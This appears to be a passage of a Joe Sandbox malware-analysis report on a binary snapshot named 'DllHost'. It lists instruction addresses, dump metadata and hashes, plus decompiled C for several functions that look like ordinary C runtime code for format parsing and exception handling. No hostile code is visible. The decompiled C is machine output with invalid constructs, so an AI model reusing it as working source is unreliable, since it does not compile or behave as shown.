                                                                                                                                                              0x7ff7191dae59
                                                                                                                                                              0x7ff7191dae5c
                                                                                                                                                              0x7ff7191dae68
                                                                                                                                                              0x7ff7191dae77
                                                                                                                                                              0x7ff7191dae7a
                                                                                                                                                              0x7ff7191dae80
                                                                                                                                                              0x7ff7191dae86
                                                                                                                                                              0x7ff7191dae88
                                                                                                                                                              0x7ff7191dae91
                                                                                                                                                              0x7ff7191dae9a
                                                                                                                                                              0x7ff7191daea3
                                                                                                                                                              0x7ff7191daea8
                                                                                                                                                              0x7ff7191daead
                                                                                                                                                              0x7ff7191daeb2
                                                                                                                                                              0x7ff7191daeb7
                                                                                                                                                              0x7ff7191daec0
                                                                                                                                                              0x7ff7191daec5
                                                                                                                                                              0x7ff7191daecd
                                                                                                                                                              0x7ff7191daed2
                                                                                                                                                              0x7ff7191daedb
                                                                                                                                                              0x7ff7191daee4
                                                                                                                                                              0x7ff7191daee9
                                                                                                                                                              0x7ff7191daeee
                                                                                                                                                              0x7ff7191daef7
                                                                                                                                                              0x7ff7191daefc
                                                                                                                                                              0x7ff7191daeff
                                                                                                                                                              0x7ff7191daf02
                                                                                                                                                              0x7ff7191daf04
                                                                                                                                                              0x7ff7191daf07
                                                                                                                                                              0x7ff7191daf10
                                                                                                                                                              0x7ff7191daf16
                                                                                                                                                              0x7ff7191daf18
                                                                                                                                                              0x7ff7191daf21
                                                                                                                                                              0x7ff7191daf24
                                                                                                                                                              0x7ff7191daf29
                                                                                                                                                              0x7ff7191daf2b
                                                                                                                                                              0x7ff7191daf31
                                                                                                                                                              0x7ff7191daf36
                                                                                                                                                              0x7ff7191daf38
                                                                                                                                                              0x7ff7191daf3d
                                                                                                                                                              0x7ff7191daf41
                                                                                                                                                              0x7ff7191daf45
                                                                                                                                                              0x7ff7191daf49
                                                                                                                                                              0x7ff7191daf4d
                                                                                                                                                              0x7ff7191daf4f
                                                                                                                                                              0x7ff7191daf53
                                                                                                                                                              0x7ff7191daf55
                                                                                                                                                              0x7ff7191daf59
                                                                                                                                                              0x7ff7191daf5b
                                                                                                                                                              0x7ff7191daf5f
                                                                                                                                                              0x7ff7191daf61
                                                                                                                                                              0x7ff7191daf65
                                                                                                                                                              0x7ff7191daf67
                                                                                                                                                              0x7ff7191daf6b
                                                                                                                                                              0x7ff7191daf6d
                                                                                                                                                              0x7ff7191daf71
                                                                                                                                                              0x7ff7191daf75
                                                                                                                                                              0x7ff7191daf78
                                                                                                                                                              0x7ff7191daf7b
                                                                                                                                                              0x7ff7191daf7f
                                                                                                                                                              0x7ff7191daf8b
                                                                                                                                                              0x7ff7191daf91
                                                                                                                                                              0x7ff7191daf93
                                                                                                                                                              0x7ff7191daf98
                                                                                                                                                              0x7ff7191daf9e
                                                                                                                                                              0x7ff7191dafa5
                                                                                                                                                              0x7ff7191dafab
                                                                                                                                                              0x7ff7191dafad
                                                                                                                                                              0x7ff7191dafba
                                                                                                                                                              0x7ff7191dafd7

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: $*
                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                              • Opcode ID: 389e6599efa46bdfa1d36c5140e56b4e0358bdf375aa5de0434f5ce8ff31651c
                                                                                                                                                              • Instruction ID: d9af29ba6e208d10ab114699144143d3a52549cc348ecca5574c0c56f3bf9b9e
                                                                                                                                                              • Opcode Fuzzy Hash: 389e6599efa46bdfa1d36c5140e56b4e0358bdf375aa5de0434f5ce8ff31651c
                                                                                                                                                              • Instruction Fuzzy Hash: 4F6154B3908A5186F765EF38A05907CB7F0EB05B6CF941279D64A02694CF2CD5CBE760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DAFEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF77FF7191DAFEC(signed int __edi, void* __esi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
				unsigned int _t79;
				intOrPtr _t90;
				signed int _t98;
				signed int _t100;
				char _t102;
				signed int _t105;
				unsigned int _t113;
				void* _t133;
				void* _t143;

				_a16 = __rbx;
				_a24 = __rbp;
				_t105 = __edi | 0xffffffff;
				_t133 = __rcx;
				if ( *((long long*)(__rcx + 0x468)) == 0) goto 0x191db1e2;
				if ( *((long long*)(__rcx + 0x18)) != 0) goto 0x191db02d;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191db1d2;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x191db1cf;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0x191db1a7;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x191db1bc;
				if (__rcx - 0x20 - 0x5a > 0) goto 0x191db080;
				asm("lfence");
				_t128 =  *((intOrPtr*)(__rcx + 0x41));
				goto 0x191db082;
				_t79 = ( *( *((intOrPtr*)(__rcx + 0x41)) + 0x19203bd0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t79;
				if (_t79 == 8) goto 0x191db1e2;
				_t113 = _t79;
				if (_t113 == 0) goto 0x191db19b;
				if (_t113 == 0) goto 0x191db182;
				if (_t113 == 0) goto 0x191db14d;
				if (_t113 == 0) goto 0x191db121;
				if (_t113 == 0) goto 0x191db118;
				if (_t113 == 0) goto 0x191db0eb;
				if (_t113 == 0) goto 0x191db0de;
				if (_t79 - 0xfffffffffffffffc != 1) goto 0x191db1f2;
				E00007FF77FF7191DB488(__rcx, __rcx, _t143, 0x19203bd0);
				goto 0x191db1a3;
				E00007FF77FF7191DB314(_t128, _t133);
				goto 0x191db1a3;
				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x191db102;
				E00007FF77FF7191DAD30(_t128, _t133, _t133, _t133 + 0x38, 0x19203bd0);
				goto 0x191db1a3;
				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
				_t98 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
				_t99 =  <  ? _t105 : _t98;
				 *(_t133 + 0x38) =  <  ? _t105 : _t98;
				goto 0x191db149;
				 *(_t133 + 0x38) =  *(_t133 + 0x38) & 0x00000000;
				goto 0x191db1a7;
				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x191db12d;
				goto 0x191db0f5;
				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
				_t100 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
				 *(_t133 + 0x34) = _t100;
				if (_t100 >= 0) goto 0x191db149;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
				 *(_t133 + 0x34) =  ~_t100;
				goto 0x191db1a3;
				_t90 =  *((intOrPtr*)(_t133 + 0x41));
				if (_t90 == 0x20) goto 0x191db17c;
				if (_t90 == 0x23) goto 0x191db176;
				if (_t90 == 0x2b) goto 0x191db170;
				if (_t90 == 0x2d) goto 0x191db16a;
				if (_t90 != 0x30) goto 0x191db1a7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000008;
				goto 0x191db1a7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
				goto 0x191db1a7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000001;
				goto 0x191db1a7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000020;
				goto 0x191db1a7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000002;
				goto 0x191db1a7;
				 *(_t133 + 0x34) =  *(_t133 + 0x34) & 0x00000000;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) & 0x00000000;
				 *(_t133 + 0x3c) =  *(_t133 + 0x3c) & 0x00000000;
				 *((char*)(_t133 + 0x40)) = 0;
				 *(_t133 + 0x38) = _t105;
				 *((char*)(_t133 + 0x54)) = 0;
				goto 0x191db1a7;
				if (E00007FF77FF7191DB1F8(_t133) == 0) goto 0x191db1f2;
				_t102 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18))));
				 *((char*)(_t133 + 0x41)) = _t102;
				if (_t102 != 0) goto 0x191db054;
				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 1;
				 *((intOrPtr*)(_t133 + 0x470)) =  *((intOrPtr*)(_t133 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t133 + 0x470)) != 2) goto 0x191db047;
				return  *((intOrPtr*)(_t133 + 0x28));
			}












                                                                                                                                                              0x7ff7191dafec
                                                                                                                                                              0x7ff7191daff1
                                                                                                                                                              0x7ff7191daffb
                                                                                                                                                              0x7ff7191daffe
                                                                                                                                                              0x7ff7191db009
                                                                                                                                                              0x7ff7191db014
                                                                                                                                                              0x7ff7191db016
                                                                                                                                                              0x7ff7191db01b
                                                                                                                                                              0x7ff7191db021
                                                                                                                                                              0x7ff7191db028
                                                                                                                                                              0x7ff7191db02d
                                                                                                                                                              0x7ff7191db03a
                                                                                                                                                              0x7ff7191db047
                                                                                                                                                              0x7ff7191db04b
                                                                                                                                                              0x7ff7191db04f
                                                                                                                                                              0x7ff7191db054
                                                                                                                                                              0x7ff7191db05c
                                                                                                                                                              0x7ff7191db06d
                                                                                                                                                              0x7ff7191db06f
                                                                                                                                                              0x7ff7191db072
                                                                                                                                                              0x7ff7191db07e
                                                                                                                                                              0x7ff7191db08b
                                                                                                                                                              0x7ff7191db08e
                                                                                                                                                              0x7ff7191db094
                                                                                                                                                              0x7ff7191db09a
                                                                                                                                                              0x7ff7191db09c
                                                                                                                                                              0x7ff7191db0a5
                                                                                                                                                              0x7ff7191db0ae
                                                                                                                                                              0x7ff7191db0b7
                                                                                                                                                              0x7ff7191db0bc
                                                                                                                                                              0x7ff7191db0c1
                                                                                                                                                              0x7ff7191db0c6
                                                                                                                                                              0x7ff7191db0cb
                                                                                                                                                              0x7ff7191db0d4
                                                                                                                                                              0x7ff7191db0d9
                                                                                                                                                              0x7ff7191db0e1
                                                                                                                                                              0x7ff7191db0e6
                                                                                                                                                              0x7ff7191db0ef
                                                                                                                                                              0x7ff7191db0f8
                                                                                                                                                              0x7ff7191db0fd
                                                                                                                                                              0x7ff7191db102
                                                                                                                                                              0x7ff7191db10b
                                                                                                                                                              0x7ff7191db110
                                                                                                                                                              0x7ff7191db113
                                                                                                                                                              0x7ff7191db116
                                                                                                                                                              0x7ff7191db118
                                                                                                                                                              0x7ff7191db11c
                                                                                                                                                              0x7ff7191db125
                                                                                                                                                              0x7ff7191db12b
                                                                                                                                                              0x7ff7191db12d
                                                                                                                                                              0x7ff7191db136
                                                                                                                                                              0x7ff7191db139
                                                                                                                                                              0x7ff7191db13e
                                                                                                                                                              0x7ff7191db140
                                                                                                                                                              0x7ff7191db146
                                                                                                                                                              0x7ff7191db14b
                                                                                                                                                              0x7ff7191db14d
                                                                                                                                                              0x7ff7191db152
                                                                                                                                                              0x7ff7191db156
                                                                                                                                                              0x7ff7191db15a
                                                                                                                                                              0x7ff7191db15e
                                                                                                                                                              0x7ff7191db162
                                                                                                                                                              0x7ff7191db164
                                                                                                                                                              0x7ff7191db168
                                                                                                                                                              0x7ff7191db16a
                                                                                                                                                              0x7ff7191db16e
                                                                                                                                                              0x7ff7191db170
                                                                                                                                                              0x7ff7191db174
                                                                                                                                                              0x7ff7191db176
                                                                                                                                                              0x7ff7191db17a
                                                                                                                                                              0x7ff7191db17c
                                                                                                                                                              0x7ff7191db180
                                                                                                                                                              0x7ff7191db182
                                                                                                                                                              0x7ff7191db186
                                                                                                                                                              0x7ff7191db18a
                                                                                                                                                              0x7ff7191db18e
                                                                                                                                                              0x7ff7191db192
                                                                                                                                                              0x7ff7191db195
                                                                                                                                                              0x7ff7191db199
                                                                                                                                                              0x7ff7191db1a5
                                                                                                                                                              0x7ff7191db1ab
                                                                                                                                                              0x7ff7191db1ad
                                                                                                                                                              0x7ff7191db1b2
                                                                                                                                                              0x7ff7191db1b8
                                                                                                                                                              0x7ff7191db1bc
                                                                                                                                                              0x7ff7191db1c9
                                                                                                                                                              0x7ff7191db1e1

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: $*
                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                              • Opcode ID: 0e15af01a23a2ca4d13a88c4a0f2e907c061259ee2eea85d0c19f9db09e0734c
                                                                                                                                                              • Instruction ID: 19edd833b789634ca3d328f9ad4aacbb0aba3fb66b8530e7d91acb60a65ea03f
                                                                                                                                                              • Opcode Fuzzy Hash: 0e15af01a23a2ca4d13a88c4a0f2e907c061259ee2eea85d0c19f9db09e0734c
                                                                                                                                                              • Instruction Fuzzy Hash: 2C614172988A4286F764AE29B04C37DB7F1FB05B2DF941135C64B42195CF2CE5CBE660
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D6380 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00007FF77FF7191D6380(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x191d6424;
				E00007FF77FF7191D4EF8(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x191d643f;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00007FF77FF7191D4EF8(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x191d643f;
				if ( *__rcx == 0xe0434f4d) goto 0x191d643f;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x191d6443;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00007FF77FF7191D32F0(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x191d6443;
				return _t19;
			}















                                                                                                                                                              0x7ff7191d6380
                                                                                                                                                              0x7ff7191d6383
                                                                                                                                                              0x7ff7191d6387
                                                                                                                                                              0x7ff7191d638b
                                                                                                                                                              0x7ff7191d639a
                                                                                                                                                              0x7ff7191d639e
                                                                                                                                                              0x7ff7191d63b4
                                                                                                                                                              0x7ff7191d63b6
                                                                                                                                                              0x7ff7191d63bb
                                                                                                                                                              0x7ff7191d63c8
                                                                                                                                                              0x7ff7191d63cc
                                                                                                                                                              0x7ff7191d63d5
                                                                                                                                                              0x7ff7191d63de
                                                                                                                                                              0x7ff7191d63e7
                                                                                                                                                              0x7ff7191d63f0
                                                                                                                                                              0x7ff7191d63f4
                                                                                                                                                              0x7ff7191d6404
                                                                                                                                                              0x7ff7191d640c
                                                                                                                                                              0x7ff7191d6411
                                                                                                                                                              0x7ff7191d6416
                                                                                                                                                              0x7ff7191d641b
                                                                                                                                                              0x7ff7191d6422
                                                                                                                                                              0x7ff7191d643e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                              • Opcode ID: d5ba12a3f3656f9147ec52c5cf84c1fff3ce0e69a550e04dd3e60d0cd19f7683
                                                                                                                                                              • Instruction ID: 2784c272c74a8340954734303cda97685630f3f026d94531dda6c5e6eb5d238f
                                                                                                                                                              • Opcode Fuzzy Hash: d5ba12a3f3656f9147ec52c5cf84c1fff3ce0e69a550e04dd3e60d0cd19f7683
                                                                                                                                                              • Instruction Fuzzy Hash: 75514933A08A458AE711AF65E0842ADBBB0FB48BDCF544525EF4913B59DF38E18AD710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D6B0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E00007FF77FF7191D6B0C(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t100;
				void* _t108;
				intOrPtr _t110;
				signed int* _t115;
				intOrPtr* _t135;
				void* _t138;
				void* _t141;
				void* _t143;
				void* _t157;
				void* _t158;

				_t108 = _t143;
				 *((long long*)(_t108 + 8)) = __rbx;
				 *((long long*)(_t108 + 0x10)) = __rbp;
				 *((long long*)(_t108 + 0x18)) = __rsi;
				 *((long long*)(_t108 + 0x20)) = __rdi;
				_t135 = __rcx;
				_t138 = __r9;
				_t158 = __r8;
				_t141 = __rdx;
				E00007FF77FF7191D8194(_t55, __r8);
				E00007FF77FF7191D4EF8(_t108);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t108 + 0x40)) != 0) goto 0x191d6b8e;
				if ( *__rcx == 0xe06d7363) goto 0x191d6b8e;
				if ( *__rcx != 0x80000029) goto 0x191d6b72;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x191d6b76;
				goto 0x191d6b74;
				if ( *__rcx == 0x80000026) goto 0x191d6b8e;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x191d6b8e;
				if ((_t115[9] & 0x00000001) != 0) goto 0x191d6d1d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x191d6c26;
				if (_t115[1] == 0) goto 0x191d6d1d;
				if (_a48 != 0) goto 0x191d6d1d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x191d6c13;
				if ( *__rcx != 0x80000026) goto 0x191d6bf1;
				_t60 = E00007FF77FF7191D513C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x191d6d3d;
				if (_t60 - _t115[1] >= 0) goto 0x191d6d3d;
				r9d = _t60;
				E00007FF77FF7191D7804(_t108, _t141, __r9, _t115);
				goto 0x191d6d1d;
				if ( *_t135 != 0x80000029) goto 0x191d6c13;
				r9d =  *((intOrPtr*)(_t135 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x191d6d3d;
				if (r9d - _t115[1] >= 0) goto 0x191d6d3d;
				goto 0x191d6be1;
				E00007FF77FF7191D3544(r9d - _t115[1], _t108, _t115, __r9, __r9, _t115);
				goto 0x191d6d1d;
				if (_t115[3] != 0) goto 0x191d6c6e;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x191d6c4e;
				_t100 = _t115[8];
				if (_t100 == 0) goto 0x191d6c4e;
				E00007FF77FF7191D3DE8(_t108);
				if (_t100 != 0) goto 0x191d6c6e;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x191d6d1d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x191d6d1d;
				if ( *_t135 != 0xe06d7363) goto 0x191d6ce4;
				if ( *((intOrPtr*)(_t135 + 0x18)) - 3 < 0) goto 0x191d6ce4;
				if ( *((intOrPtr*)(_t135 + 0x20)) - 0x19930522 <= 0) goto 0x191d6ce4;
				_t110 =  *((intOrPtr*)(_t135 + 0x30));
				if ( *((intOrPtr*)(_t110 + 8)) == 0) goto 0x191d6ce4;
				E00007FF77FF7191D3DFC(_t110);
				if (_t110 +  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x30)) + 8)) == 0) goto 0x191d6ce4;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x191f94c0(_t157);
				goto 0x191d6d22;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00007FF77FF7191D59BC(_a48, 0x80000026, _t135, _t141, _t158, _t138, _t110 +  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                                                                              0x7ff7191d6b0c
                                                                                                                                                              0x7ff7191d6b0f
                                                                                                                                                              0x7ff7191d6b13
                                                                                                                                                              0x7ff7191d6b17
                                                                                                                                                              0x7ff7191d6b1b
                                                                                                                                                              0x7ff7191d6b25
                                                                                                                                                              0x7ff7191d6b28
                                                                                                                                                              0x7ff7191d6b2e
                                                                                                                                                              0x7ff7191d6b31
                                                                                                                                                              0x7ff7191d6b34
                                                                                                                                                              0x7ff7191d6b39
                                                                                                                                                              0x7ff7191d6b3e
                                                                                                                                                              0x7ff7191d6b54
                                                                                                                                                              0x7ff7191d6b5c
                                                                                                                                                              0x7ff7191d6b60
                                                                                                                                                              0x7ff7191d6b66
                                                                                                                                                              0x7ff7191d6b70
                                                                                                                                                              0x7ff7191d6b74
                                                                                                                                                              0x7ff7191d6b82
                                                                                                                                                              0x7ff7191d6b88
                                                                                                                                                              0x7ff7191d6b92
                                                                                                                                                              0x7ff7191d6b9c
                                                                                                                                                              0x7ff7191d6baa
                                                                                                                                                              0x7ff7191d6bb4
                                                                                                                                                              0x7ff7191d6bb8
                                                                                                                                                              0x7ff7191d6bc4
                                                                                                                                                              0x7ff7191d6bcc
                                                                                                                                                              0x7ff7191d6bd5
                                                                                                                                                              0x7ff7191d6bdb
                                                                                                                                                              0x7ff7191d6be7
                                                                                                                                                              0x7ff7191d6bec
                                                                                                                                                              0x7ff7191d6bf3
                                                                                                                                                              0x7ff7191d6bf5
                                                                                                                                                              0x7ff7191d6bfd
                                                                                                                                                              0x7ff7191d6c07
                                                                                                                                                              0x7ff7191d6c11
                                                                                                                                                              0x7ff7191d6c1c
                                                                                                                                                              0x7ff7191d6c21
                                                                                                                                                              0x7ff7191d6c2a
                                                                                                                                                              0x7ff7191d6c38
                                                                                                                                                              0x7ff7191d6c3a
                                                                                                                                                              0x7ff7191d6c3e
                                                                                                                                                              0x7ff7191d6c40
                                                                                                                                                              0x7ff7191d6c4c
                                                                                                                                                              0x7ff7191d6c5a
                                                                                                                                                              0x7ff7191d6c68
                                                                                                                                                              0x7ff7191d6c74
                                                                                                                                                              0x7ff7191d6c7a
                                                                                                                                                              0x7ff7191d6c83
                                                                                                                                                              0x7ff7191d6c85
                                                                                                                                                              0x7ff7191d6c8d
                                                                                                                                                              0x7ff7191d6c8f
                                                                                                                                                              0x7ff7191d6ca2
                                                                                                                                                              0x7ff7191d6caf
                                                                                                                                                              0x7ff7191d6cc1
                                                                                                                                                              0x7ff7191d6cd0
                                                                                                                                                              0x7ff7191d6cd7
                                                                                                                                                              0x7ff7191d6cdc
                                                                                                                                                              0x7ff7191d6ce2
                                                                                                                                                              0x7ff7191d6cef
                                                                                                                                                              0x7ff7191d6d01
                                                                                                                                                              0x7ff7191d6d0f
                                                                                                                                                              0x7ff7191d6d13
                                                                                                                                                              0x7ff7191d6d18
                                                                                                                                                              0x7ff7191d6d3c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                              • Opcode ID: 08d856c06adae109ea5504a5777f8aad7d0014654fe766c793eb5dc1d70e26a6
                                                                                                                                                              • Instruction ID: b6514bd8778954012f416a98f561012e664feb5a26ed90bf3179830491bbfcd4
                                                                                                                                                              • Opcode Fuzzy Hash: 08d856c06adae109ea5504a5777f8aad7d0014654fe766c793eb5dc1d70e26a6
                                                                                                                                                              • Instruction Fuzzy Hash: 15517132908E8186FB64AF11B448268B7F0FB44BACF944535DA9D47A95CF3CE49ADB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E9478 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191E9478(void* __ebx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t11;
				intOrPtr* _t20;
				intOrPtr* _t34;

				_t20 = _t34;
				 *((long long*)(_t20 + 8)) = __rbx;
				 *((long long*)(_t20 + 0x10)) = __rbp;
				 *((long long*)(_t20 + 0x18)) = __rsi;
				 *((long long*)(_t20 + 0x20)) = __rdi;
				r15b = r9b;
				_t10 =  >  ? __ebx : 0;
				_t11 = ( >  ? __ebx : 0) + 9;
				if (__rdx - _t20 > 0) goto 0x191e94dd;
				E00007FF77FF7191DC854(_t20);
				 *_t20 = 0x22;
				E00007FF77FF7191DA5D8();
				return 0x22;
			}






                                                                                                                                                              0x7ff7191e9478
                                                                                                                                                              0x7ff7191e947b
                                                                                                                                                              0x7ff7191e947f
